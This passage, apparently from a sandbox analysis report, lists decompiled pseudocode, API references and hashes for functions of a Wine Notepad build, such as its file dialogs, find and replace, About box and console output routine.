								 *(_t50 + _t55 * 2) = _t31;
								_t55 = _t55 + 1;
							} else {
								_t37 = 1;
							}
						} else {
							_t39 = 0x26;
							if(_t31 != _t39) {
								_t40 = 0x70;
								if(_t31 == _t40) {
									_t34 = wnsprintfW(_t50 + _t55 * 2, 0xb, 0x447a08, _v12);
									_t44 = _v8;
									_t59 = _t59 + 0x10;
									_t55 = _t55 + _t34;
								}
							} else {
								 *(_t50 + _t55 * 2) = _t39;
								_t55 = _t55 + 1;
							}
							_t37 = 0;
						}
						_t45 = _t44 + 1;
						_v8 = _t45;
						_t30 =  &(_t35[_t45]);
						_t44 = _v8;
					} while ( *_t30 != 0);
					goto L24;
				} else {
					goto L1;
				}
				do {
					L1:
					_push(0x26);
					if(_t53 == 0) {
						_pop(_t47);
						_push(0);
						_pop(0);
						if( *_t36 != _t47) {
							_t23 = _t23 + 1;
						} else {
							_t53 = 1;
						}
					} else {
						_t41 =  *_t36 & 0x0000ffff;
						_pop(_t57);
						if(_t41 != _t57) {
							_t58 = 0x70;
							if(_t41 == _t58) {
								_t23 = _t23 + 0xb;
							}
						} else {
							_t23 = _t23 + 1;
						}
						_t53 = 0;
					}
					_t49 = _t49 + 1;
					_t36 =  &(_t35[_t49]);
				} while ( *_t36 != 0);
				goto L11;
			}


























                                                      0x0040171b
                                                      0x00401722
                                                      0x00401724
                                                      0x00401729
                                                      0x00401732
                                                      0x00401734
                                                      0x00401736
                                                      0x0040173b
                                                      0x00401776
                                                      0x0040178c
                                                      0x00401790
                                                      0x0040180b
                                                      0x00401813
                                                      0x00401813
                                                      0x00401794
                                                      0x00401796
                                                      0x00401798
                                                      0x0040179a
                                                      0x004017a0
                                                      0x00401805
                                                      0x00401807
                                                      0x00000000
                                                      0x00401807
                                                      0x004017a2
                                                      0x004017a4
                                                      0x004017a4
                                                      0x004017a9
                                                      0x004017e8
                                                      0x004017ef
                                                      0x004017f3
                                                      0x004017ea
                                                      0x004017ec
                                                      0x004017ec
                                                      0x004017ab
                                                      0x004017ad
                                                      0x004017b1
                                                      0x004017bc
                                                      0x004017c0
                                                      0x004017d0
                                                      0x004017d6
                                                      0x004017d9
                                                      0x004017dc
                                                      0x004017dc
                                                      0x004017b3
                                                      0x004017b3
                                                      0x004017b7
                                                      0x004017b7
                                                      0x004017e0
                                                      0x004017e0
                                                      0x004017f4
                                                      0x004017f5
                                                      0x004017f8
                                                      0x00401800
                                                      0x00401800
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040173d
                                                      0x0040173d
                                                      0x0040173d
                                                      0x00401741
                                                      0x0040175e
                                                      0x00401762
                                                      0x00401764
                                                      0x00401765
                                                      0x0040176c
                                                      0x00401767
                                                      0x00401769
                                                      0x00401769
                                                      0x00401743
                                                      0x00401743
                                                      0x00401746
                                                      0x0040174a
                                                      0x00401751
                                                      0x00401755
                                                      0x00401757
                                                      0x00401757
                                                      0x0040174c
                                                      0x0040174c
                                                      0x0040174c
                                                      0x0040175a
                                                      0x0040175a
                                                      0x0040176d
                                                      0x0040176e
                                                      0x00401771
                                                      0x00000000

                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040177F
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00401786
                                                      • wnsprintfW.SHLWAPI ref: 004017D0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcesswnsprintf
                                                      • String ID: &
                                                      • API String ID: 3886780628-1010288
                                                      • Opcode ID: 84c691f8b60368da06954949850fd1694c7aedcbf2d82b668623104e533bd806
                                                      • Instruction ID: 8a357e19f2af0a4d2ea800eed7b832548ff5bbe0d4cd8803dad4478f50b07c9f
                                                      • Opcode Fuzzy Hash: 84c691f8b60368da06954949850fd1694c7aedcbf2d82b668623104e533bd806
                                                      • Instruction Fuzzy Hash: 6731F536E00215ABCB35AB78C840ABBB3A1FB98710F548177D846E72E4E6758D4283D8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401557 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00401557(void* __edi) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				signed int _v60;
				WCHAR* _v64;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				struct tagOFNA _v92;
				short _v612;
				intOrPtr _t21;
				intOrPtr _t22;
				int _t25;

				E00403D00(__edi,  &_v92, 0, 0x58);
				lstrcpyW( &_v612, L"*.txt");
				_t21 =  *0x44cf04; // 0x0
				_v60 = _v60 & 0x00000000;
				 *0x44dc68 =  *0x44dc68 & 0x00000000;
				_v88 = _t21;
				_t22 =  *0x44cf00; // 0x0
				_v84 = _t22;
				_v64 =  &_v612;
				_v92 = 0x58;
				_v80 = 0x44d7a4;
				_v40 = 0x881864;
				_v24 = E0040146D;
				_v20 = 0x190;
				_v32 = 0x447a10;
				 *0x44dc6c = 1;
				_t25 = GetOpenFileNameW( &_v92);
				if(_t25 != 0) {
					return E004010F4(_v64,  *0x44dc68);
				}
				return _t25;
			}

















                                                      0x00401568
                                                      0x0040157c
                                                      0x00401582
                                                      0x00401587
                                                      0x0040158b
                                                      0x00401592
                                                      0x00401595
                                                      0x0040159a
                                                      0x004015a3
                                                      0x004015aa
                                                      0x004015b1
                                                      0x004015b8
                                                      0x004015bf
                                                      0x004015c6
                                                      0x004015cd
                                                      0x004015d4
                                                      0x004015de
                                                      0x004015e6
                                                      0x00000000
                                                      0x004015f1
                                                      0x004015f9

                                                      APIs
                                                      • lstrcpyW.KERNEL32 ref: 0040157C
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 004015DE
                                                        • Part of subcall function 004010F4: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00401121
                                                        • Part of subcall function 004010F4: GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00401135
                                                        • Part of subcall function 004010F4: GetProcessHeap.KERNEL32(00000000,-00000002,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00401149
                                                        • Part of subcall function 004010F4: HeapAlloc.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00401150
                                                        • Part of subcall function 004010F4: CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0040115D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: File$Heap$AllocCloseCreateHandleNameOpenProcessSizelstrcpy
                                                      • String ID: *.txt$X
                                                      • API String ID: 1235598976-2927553402
                                                      • Opcode ID: b18bbc3e88d30829cbc58f5c02543d6f7b9283fa11732ffb6d43da3ea8c08ac6
                                                      • Instruction ID: 955bdf9d55a00eaad43a300bcd8c6dc851d64748ef0514cefc4d33d6a3f96c26
                                                      • Opcode Fuzzy Hash: b18bbc3e88d30829cbc58f5c02543d6f7b9283fa11732ffb6d43da3ea8c08ac6
                                                      • Instruction Fuzzy Hash: 2E115BB4D0024C9BDB00DFD1EC897DEBBB8BB05305F00402AD904BB290DBB95608CF88
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401611 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E00401611() {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				signed int _v60;
				WCHAR* _v64;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				struct tagOFNA _v92;
				short _v612;
				intOrPtr _t20;
				intOrPtr _t21;
				signed int _t25;
				void* _t28;

				E00403D00(_t28,  &_v92, 0, 0x58);
				lstrcpyW( &_v612, L"*.txt");
				_t20 =  *0x44cf04; // 0x0
				_v60 = _v60 & 0x00000000;
				 *0x44dc6c =  *0x44dc6c & 0x00000000;
				_v88 = _t20;
				_t21 =  *0x44cf00; // 0x0
				_v84 = _t21;
				_v64 =  &_v612;
				 *0x44dc68 =  *0x44d7a0;
				_v92 = 0x58;
				_v80 = 0x44d7a4;
				_v40 = 0x880866;
				_v24 = E0040146D;
				_v20 = 0x190;
				_v32 = L"txt";
				_t25 = GetSaveFileNameW( &_v92);
				asm("sbb eax, eax");
				return  ~( ~_t25);
			}


















                                                      0x00401622
                                                      0x00401636
                                                      0x0040163c
                                                      0x00401641
                                                      0x00401645
                                                      0x0040164c
                                                      0x0040164f
                                                      0x00401654
                                                      0x0040165d
                                                      0x00401665
                                                      0x0040166e
                                                      0x00401675
                                                      0x0040167c
                                                      0x00401683
                                                      0x0040168a
                                                      0x00401691
                                                      0x00401698
                                                      0x004016a0
                                                      0x004016a7

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: FileNameSavelstrcpy
                                                      • String ID: *.txt$X
                                                      • API String ID: 4227682130-2927553402
                                                      • Opcode ID: c615ea36e4701d9211b137ec97af106c774438422c17d1dd9a652d91a49a3d49
                                                      • Instruction ID: d785ac8fde8fb99cc0d04241f746dc4c4e48c27722e92e1eaf8edb72bd82a361
                                                      • Opcode Fuzzy Hash: c615ea36e4701d9211b137ec97af106c774438422c17d1dd9a652d91a49a3d49
                                                      • Instruction Fuzzy Hash: 6D0105B9D002489FDB00DFE4EC89B9EBBB4AB05705F00412AA904E6290E7B95608CF88
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402189 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 84%
                                                      			E00402189() {
				void* __edi;
				struct HWND__* _t2;
				intOrPtr _t5;
				intOrPtr _t6;
				void* _t8;
				void* _t11;
				signed int _t12;
				void* _t15;
				void* _t18;
				void* _t19;

				_t2 =  *0x44cf08; // 0x0
				if(_t2 == 0) {
					_t12 = 0xa;
					memset(0x44e09c, 0, _t12 << 2);
					_t5 =  *0x44cf04; // 0x0
					 *0x44e0a0 = _t5;
					_t6 =  *0x44cf00; // 0x0
					 *0x44e0a4 = _t6;
					0x44e09c->lStructSize = 0x28;
					 *0x44e0ac = 0x44cf80;
					 *0x44e0b4 = 0;
					 *0x44e0b0 = 0x44d188;
					 *0x44e0a8 = 0x10001;
					_t8 = ReplaceTextW(0x44e09c);
					 *0x44cf08 = _t8;
					_t18 = _t15;
					__eflags = _t8;
					if(__eflags == 0) {
						_push(0x563);
						return E0040CA7D(_t11, 0x44e09c, _t18, _t19, __eflags, L"Globals.hFindReplaceDlg != 0", L"main.c");
					}
					return _t8;
				} else {
					return SetActiveWindow(_t2);
				}
			}













                                                      0x00402189
                                                      0x00402190
                                                      0x004021a4
                                                      0x004021a7
                                                      0x004021a9
                                                      0x004021ae
                                                      0x004021b3
                                                      0x004021b8
                                                      0x004021c0
                                                      0x004021ca
                                                      0x004021d4
                                                      0x004021d9
                                                      0x004021e3
                                                      0x004021ed
                                                      0x004021f3
                                                      0x004021f8
                                                      0x004021f9
                                                      0x004021fb
                                                      0x004021fd
                                                      0x00000000
                                                      0x00402211
                                                      0x00402214
                                                      0x00402192
                                                      0x00402199
                                                      0x00402199

                                                      APIs
                                                      • SetActiveWindow.USER32(00000000), ref: 00402193
                                                      • ReplaceTextW.COMDLG32(0044E09C), ref: 004021ED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ActiveReplaceTextWindow
                                                      • String ID: Globals.hFindReplaceDlg != 0$main.c
                                                      • API String ID: 2959152451-3286657855
                                                      • Opcode ID: 44eaebb4ca31970c0a123851b15a8067445717b2ee542919cd153f5cc481d9cc
                                                      • Instruction ID: 41f57e9c5970928f031c680fd1d6c010e9f5ecd0e7f927330d94a427993e8085
                                                      • Opcode Fuzzy Hash: 44eaebb4ca31970c0a123851b15a8067445717b2ee542919cd153f5cc481d9cc
                                                      • Instruction Fuzzy Hash: 33F031B8A01214AFE740CF6AFC88B023BE1B756B05744843AE614D63E0D7B984099B2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004020F8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 84%
                                                      			E004020F8() {
				void* __edi;
				struct HWND__* _t2;
				intOrPtr _t5;
				intOrPtr _t6;
				void* _t8;
				void* _t11;
				signed int _t12;
				void* _t15;
				void* _t18;
				void* _t19;

				_t2 =  *0x44cf08; // 0x0
				if(_t2 == 0) {
					_t12 = 0xa;
					memset(0x44e09c, 0, _t12 << 2);
					_t5 =  *0x44cf04; // 0x0
					 *0x44e0a0 = _t5;
					_t6 =  *0x44cf00; // 0x0
					 *0x44e0a4 = _t6;
					 *0x44e09c = 0x28;
					 *0x44e0ac = 0x44cf80;
					 *0x44e0b4 = 0;
					 *0x44e0a8 = 0x10001;
					_t8 = FindTextW(0x44e09c);
					 *0x44cf08 = _t8;
					_t18 = _t15;
					__eflags = _t8;
					if(__eflags == 0) {
						_push(0x541);
						return E0040CA7D(_t11, 0x44e09c, _t18, _t19, __eflags, L"Globals.hFindReplaceDlg != 0", L"main.c");
					}
					return _t8;
				} else {
					return SetActiveWindow(_t2);
				}
			}













                                                      0x004020f8
                                                      0x004020ff
                                                      0x00402113
                                                      0x00402116
                                                      0x00402118
                                                      0x0040211d
                                                      0x00402122
                                                      0x00402127
                                                      0x0040212f
                                                      0x00402139
                                                      0x00402143
                                                      0x00402149
                                                      0x00402153
                                                      0x00402159
                                                      0x0040215e
                                                      0x0040215f
                                                      0x00402161
                                                      0x00402163
                                                      0x00000000
                                                      0x00402177
                                                      0x0040217a
                                                      0x00402101
                                                      0x00402108
                                                      0x00402108

                                                      APIs
                                                      • SetActiveWindow.USER32(00000000), ref: 00402102
                                                      • FindTextW.COMDLG32(0044E09C), ref: 00402153
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ActiveFindTextWindow
                                                      • String ID: Globals.hFindReplaceDlg != 0$main.c
                                                      • API String ID: 1462590097-3286657855
                                                      • Opcode ID: bb149fa3ac7cfdc59271bd24f52ea7003e751f363738e6ea2fc5824c7a7983f6
                                                      • Instruction ID: 67d82cd1c539eb53112209309783aa75c0dd9927d92a8170d36724992a29c5cf
                                                      • Opcode Fuzzy Hash: bb149fa3ac7cfdc59271bd24f52ea7003e751f363738e6ea2fc5824c7a7983f6
                                                      • Instruction Fuzzy Hash: 9CF04FBC601214AFE750CF2AEC88B023BE1B756B05744803AE614D63E0E7F884489B2D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040222B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040222B() {
				short _v516;
				void* _t3;

				_t3 = LoadImageW( *0x44cf00, 0x300, 1, 0x30, 0x30, 0x8000);
				LoadStringW( *0x44cf00, 0x170,  &_v516, 0);
				return ShellAboutW( *0x44cf04,  &_v516, L"Wine Notepad", _t3);
			}





                                                      0x0040224b
                                                      0x00402267
                                                      0x0040228a

                                                      APIs
                                                      • LoadImageW.USER32 ref: 0040224B
                                                      • LoadStringW.USER32(00000170,?,00000000), ref: 00402267
                                                      • ShellAboutW.SHELL32(?,Wine Notepad,00000000), ref: 00402280
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: Load$AboutImageShellString
                                                      • String ID: Wine Notepad
                                                      • API String ID: 2733739231-3086428749
                                                      • Opcode ID: db0aebb3609697b0a998c971018d2b3f8523d1f5aece1c3972849ac1423f8bc7
                                                      • Instruction ID: 3f6da3bd64abdec65f1d4060ffca49c37a49db9d8fb3df9cc93eaa6dace926be
                                                      • Opcode Fuzzy Hash: db0aebb3609697b0a998c971018d2b3f8523d1f5aece1c3972849ac1423f8bc7
                                                      • Instruction Fuzzy Hash: C0F03035192314BBF7225B51AC8EFA53B2DF705B00F1400A1BB18650E1D6B12A148B8C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0042EC07 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E0042EC07(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				signed int _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				signed char* _t190;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				signed int _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed char* _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				void* _t296;
				struct _OVERLAPPED* _t297;
				signed int _t301;
				void* _t303;
				struct _OVERLAPPED* _t304;
				signed char* _t307;
				intOrPtr* _t308;
				signed int _t310;
				long _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				void* _t315;
				void* _t316;
				void* _t317;

				_push(0xffffffff);
				_push(E0043FD83);
				_push( *[fs:0x0]);
				_t316 = _t315 - 0x74;
				_t177 =  *0x44b018; // 0x1989d38f
				_t178 = _t177 ^ _t314;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t307 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t307;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x44c9f8 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t307;
				_v116 = GetConsoleOutputCP();
				if( *((char*)(_t265 + 0x14)) == 0) {
					E0041C290(_t265, _t291);
				}
				_t308 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t301 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0x44c9f8 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							if(( *(_t301 + _t273 + 0x2d) & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc)))) + ( *_t292 & 0x000000ff) * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									if(_t217 >= _v88) {
										 *((char*)(_t301 + _v80 + 0x2e)) =  *_t292;
										 *( *(0x44c9f8 + _v84 * 4) + _t301 + 0x2d) =  *( *(0x44c9f8 + _v84 * 4) + _t301 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t308 + 4)) = _v76 + 1;
									} else {
										_t224 = E0042CF88(_t273, _t292,  &_v68, _t292, 2, _v64);
										_t317 = _t316 + 0x10;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t301 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *(_t301 + _t273 + 0x2d) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E0042CF88(_t273, _t292);
								_t317 = _t316 + 0x10;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t301;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t303 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0x44b1c0; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								if(_t281 > _t303) {
									if(_t303 <= 0) {
										goto L44;
									} else {
										_t310 = _v72;
										do {
											 *((char*)( *(0x44c9f8 + _v84 * 4) + _t310 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
										} while (_t267 < _t303);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E00434870( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t317 = _t316 + 0x14;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										_t301 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x44b1c0)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t303) {
									if(_t303 > 0) {
										_t248 = _v52;
										_t311 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t296 =  *(0x44c9f8 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											 *((char*)(_t296 + _t311 + 0x2e)) = _t286;
											_t285 = _v72;
										} while (_t267 < _t303);
										L43:
										_t308 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t308 + 4)) =  *((intOrPtr*)(_t308 + 4)) + _t303;
								} else {
									_t287 = _v48;
									_t304 = _t267;
									_t312 = _v80;
									do {
										 *((char*)(_t314 + _t304 - 0x18)) =  *_t312;
										_t304 =  &(_t304->Internal);
										_t312 = _t312 + 1;
									} while (_t304 < _t287);
									_t305 = _v76;
									if(_v76 > 0) {
										E0043A610( &_v28 + _t287, _t292, _t305);
										_t287 = _v48;
										_t316 = _t316 + 0xc;
									}
									_t301 = _v72;
									_t297 = _t267;
									_t313 = _v84;
									do {
										 *( *((intOrPtr*)(0x44c9f8 + _t313 * 4)) + _t301 + _t297 + 0x2e) = _t267;
										_t297 =  &(_t297->Internal);
									} while (_t297 < _t287);
									_t308 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E00434870( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t317 = _t316 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E00425640(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t316 = _t317 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t308 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t308 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t308 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t308 + 8)) =  *((intOrPtr*)(_t308 + 8)) + 1;
																 *((intOrPtr*)(_t308 + 4)) =  *((intOrPtr*)(_t308 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t308 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				return E0040361D(_v20 ^ _t314);
				goto L52;
			}












































































                                                      0x0042ec0c
                                                      0x0042ec0e
                                                      0x0042ec19
                                                      0x0042ec1a
                                                      0x0042ec1d
                                                      0x0042ec22
                                                      0x0042ec24
                                                      0x0042ec2a
                                                      0x0042ec2e
                                                      0x0042ec34
                                                      0x0042ec39
                                                      0x0042ec3f
                                                      0x0042ec42
                                                      0x0042ec45
                                                      0x0042ec48
                                                      0x0042ec4b
                                                      0x0042ec4e
                                                      0x0042ec58
                                                      0x0042ec5f
                                                      0x0042ec67
                                                      0x0042ec74
                                                      0x0042ec77
                                                      0x0042ec7b
                                                      0x0042ec7b
                                                      0x0042ec83
                                                      0x0042ec8b
                                                      0x0042ec90
                                                      0x0042ec91
                                                      0x0042ec92
                                                      0x0042ec93
                                                      0x0042ec96
                                                      0x0042ec98
                                                      0x0042ec9e
                                                      0x0042eca4
                                                      0x0042eca7
                                                      0x0042eca9
